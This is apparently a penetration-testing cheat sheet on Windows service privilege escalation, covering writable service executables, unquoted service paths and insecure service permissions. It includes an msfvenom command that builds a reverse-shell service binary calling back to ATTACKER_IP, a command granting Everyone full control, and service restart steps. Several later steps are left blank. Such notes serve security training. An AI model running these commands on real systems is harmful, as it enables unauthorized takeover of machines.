search

Windows Services

hashtag
Service Configuration Basics

  • Location of Service Configurations:

    HKLM\SYSTEM\CurrentControlSet\Services\

  • Listing All Services:

    sc query

hashtag
1. Insecure Permissions on Service Executable

Steps to Exploit:

  1. Find the Service Executable:

    sc qc <SERVICE_NAME>

  2. Check Permissions on the Executable:

    icacls <EXECUTABLE_PATH>

  3. Exploitation Steps (if the user can modify the executable):

    • Create a Malicious Payload:

      msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o <SERVICE_EXECUTABLE>

    • Grant Full Permissions (if needed):

      icacls <SERVICE_EXECUTABLE> /grant Everyone:F

    • Trigger the Service:

      sc stop <SERVICE_NAME>
sc start <SERVICE_NAME>

hashtag
2. Unquoted Service Path Vulnerability

Description:

  • This vulnerability arises when the executable path of a service is not quoted and contains spaces.

  • How It Works:

    • The Service Control Manager (SCM) looks for the executable path recursively in different locations.

    • Example Path: C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

    • Search Order:

      1. C:\MyPrograms\Disk.exe

      2. C:\MyPrograms\Disk Sorter.exe

      3. C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe (default)

Exploitation Steps:

  1. Create a Malicious Binary:

    • Name it to match a higher-priority path (e.g., C:\MyPrograms\Disk.exe).

  2. Upload and Trigger the Binary:

    • Restart the service to run the malicious binary:

hashtag
3. Insecure Service Permissions

Description:

  • This vulnerability occurs when a user can modify the service configuration.

Steps to Exploit:

  1. Check Service Configuration Rights:

    • Note: Download accesschk from Sysinternals.

  2. Create a Malicious Payload:

  3. Grant Full Permissions on the Payload:

  4. Modify the Service Configuration:

  5. Trigger the Service:

PreviousAlways InstallNextPriv2Admin

Last updated